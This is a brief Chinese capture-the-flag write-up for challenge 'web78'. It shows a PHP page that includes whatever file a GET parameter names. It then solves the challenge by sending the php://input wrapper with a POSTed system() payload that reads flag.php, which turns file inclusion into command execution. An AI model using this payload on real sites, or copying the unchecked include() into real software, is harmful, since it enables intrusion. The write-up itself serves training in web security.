web78
目的很明显,需要我们去包含一个文件。
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 10:52:43
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-16 10:54:20
# @email: [email protected]
# @link: https://ctfer.com
*/
if(isset($_GET['file'])){
$file = $_GET['file'];
include($file);
}else{
highlight_file(__FILE__);
}
先尝试?file=flag.php
试一下,并没有什么效果。
之后根据提示采用伪协议
在url后拼接?file=php://input
,在post里输入<?= system('tac flag.php'); ?>
即可。